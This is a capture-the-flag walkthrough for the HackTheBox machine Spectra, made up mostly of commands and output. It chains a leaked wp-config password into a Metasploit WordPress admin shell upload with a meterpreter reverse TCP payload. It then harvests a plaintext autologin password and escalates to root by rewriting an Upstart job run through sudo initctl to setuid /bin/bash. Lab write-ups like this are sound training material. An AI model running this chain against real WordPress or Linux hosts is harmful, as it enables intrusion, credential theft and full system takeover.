INFO
Machine IP = 10.10.10.229
OS = Other
Level = EASY
Points = 20
Write the IP of the machine to your /etc/hosts file
1
| echo "10.10.10.229 spectra.htb" >> /etc/hosts
|
Scanning
1
| nmap -sC -sV 10.10.10.229
|
Enumeration
Nmap:
1
2
3
4
5
| 22/tcp ssh OpenSSH 8.1 (protocol 2.0)
80/tcp http nginx 1.17.4
1098/tcp filtered rmiactivation
3306/tcp mysql MySQL (unauthorized)
|
1
| Port 80 – WordPress Blog
|
Create a directory Spectra and cd Spectra/
then let’s do Gobuster
Gobuster:
1
| gobuster dir -u http://10.10.10.229 -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,js -t 80 -o gobuster.log
|
1
2
3
4
| /index.html (Status: 200) [Size: 283]
/main (Status: 301) [Size: 169] [--> http://10.10.10.229/main/]
/testing (Status: 301) [Size: 169] [--> http://10.10.10.229/testing/]
|
We found like backup config file for a Wordpress check source here
You can Download it via
1
| wget http://10.10.10.229/testing/wp-config.php.save
|
The important part is a user and password credential:
1
2
3
4
5
| /** MySQL database username */
define( 'DB_USER', 'devtest' );
/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );
|
Wordpress users enumeration with wpscan:
The sceound directory from Gobuster was main
which is for a Wordpress
1
| wpscan --url http://spectra.htb/main/ --random-user-agent --enumerate u
|
So we got the user administrator
1
2
3
4
5
6
7
| [+] administrator
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
|
1
| msf6 > search wp_admin_shell_upload
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost <Your IP here>
lhost => 10.10.15.26
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lport 4444
lport => 4444
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 10.10.10.229
rhosts => 10.10.10.229
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username administrator
username => administrator
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password devteam01
password => devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /main
targeturi => /main
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
shell
/bin/sh -i
|
Or you can use:
1
2
| python3 -c "import pty;pty.spawn('/bin/bash')"
nginx@spectra /tmp $
|
User Flag:
Let’s check for users:
1
2
3
4
| nginx@spectra / $ cat /etc/passwd
<SNIP>
nginx:x:20155:20156::/home/nginx:/bin/bash
katie:x:20156:20157::/home/katie:/bin/bash
|
1
2
3
4
| nginx@spectra / $ ls -l /home/katie/
total 320
drwxr-xr-x 2 katie katie 4096 Jan 15 15:55 log
-r-------- 1 katie katie 33 Feb 2 15:57 user.txt
|
So we need to move from our restricted nginx user to katie to get the flag. after search on some places I found in /opt
:
1
| -rw-r--r-- 1 root root 978 Feb 3 16:02 autologin.conf.orig
|
Let’s have a look at that first:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| nginx@spectra /opt $ cat autologin.conf.orig
cat autologin.conf.orig
<SNIP>
script
passwd=
# Read password from file. The file may optionally end with a newline.
for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
if [ -e "${dir}/passwd" ]; then
passwd="$(cat "${dir}/passwd")"
break
fi
done
<SNIP>
|
It’s a lengthy config script but there’s a line in there that points us to /etc/autologin.
1
2
3
| nginx@spectra /opt $ ls -l /etc/autologin
total 4
-rw-r--r-- 1 root root 19 Feb 3 16:43 passwd
|
1
2
| nginx@spectra /opt $ cat /etc/autologin/passwd
SummerHereWeCome!!
|
Perfect. We’ve found a password which presumably is for katie as that’s the only other user on the box. Let’s try SSH:
Root Flag:
Now we have to escalate our privilege. I going to check a sudo privileges first and if fail I’ll go with linPEAS
:
1
2
3
| katie@spectra ~ $ sudo -l
User katie may run the following commands on spectra:
(ALL) SETENV: NOPASSWD: /sbin/initctl
|
What is a initctl
:
1
2
3
| initctl allows a system administrator to communicate and interact with the Upstart init(8) daemon.
init is the parent of all processes on the system, it is executed by the kernel and is responsible for starting all other processes.
|
So we can use initctl to control starting and stopping processes as system. Sounds like a nice simple way to get a root shell. First let’s see what’s /etc/init:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| katie@spectra /etc/init $ ls -l
total 752
...
-rw-rw---- 1 root developers 478 Jun 29 2020 test.conf
-rw-rw---- 1 root developers 478 Jun 29 2020 test1.conf
-rw-rw---- 1 root developers 478 Jun 29 2020 test10.conf
-rw-rw---- 1 root developers 478 Jun 29 2020 test2.conf
-rw-rw---- 1 root developers 478 Jun 29 2020 test3.conf
-rw-rw---- 1 root developers 478 Jun 29 2020 test4.conf
-rw-rw---- 1 root developers 478 Jun 29 2020 test5.conf
-rw-rw---- 1 root developers 478 Jun 29 2020 test6.conf
-rw-rw---- 1 root developers 478 Jun 29 2020 test7.conf
-rw-rw---- 1 root developers 478 Jun 29 2020 test8.conf
-rw-rw---- 1 root developers 478 Jun 29 2020 test9.conf
...
|
Let’s check out the first one:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| katie@spectra /etc/init $ cat test.conf
description "Test node.js server"
author "katie"
start on filesystem or runlevel [2345]
stop on shutdown
script
export HOME="/srv"
echo $$ > /var/run/nodetest.pid
exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js
end script
pre-start script
echo "[`date`] Node Test Starting" >> /var/log/nodetest.log
end script
pre-stop script
rm /var/run/nodetest.pid
echo
|
We can replace the contents of this with our own code, let’s get it to change permissions on /bin/bash so we can run it with root permissions as katie.
First find the test process:
1
2
3
4
5
6
7
8
| katie@spectra /etc/init $ sudo initctl list | grep test
test stop/waiting
test1 stop/waiting
test7 stop/waiting
test6 stop/waiting
test5 stop/waiting
test4 stop/waiting
test10 stop/waiting
|
It’s already stopped, so we can edit the conf file and the start it again:
1
2
3
4
5
6
7
8
9
| katie@spectra /etc/init $ cat test.conf
description "Test node.js server"
author "katie"
start on filesystem or runlevel [...]
stop on shutdown
script
chmod +s /bin/bash
end script
|
Now we can start the process:
1
| katie@spectra /etc/init $ sudo /sbin/initctl start test
|
Now we can simply run bash with the -p option to get our root shell:
1
2
3
| katie@spectra /etc/init $ /bin/bash -p
bash-4.3# whoami
root
|
Grab the root flag and we are done:
1
2
| bash-4.3# cat /root/root.txt
|
Done!.
Hi there 👋 Support me!
Life is an echo—what you send out comes back.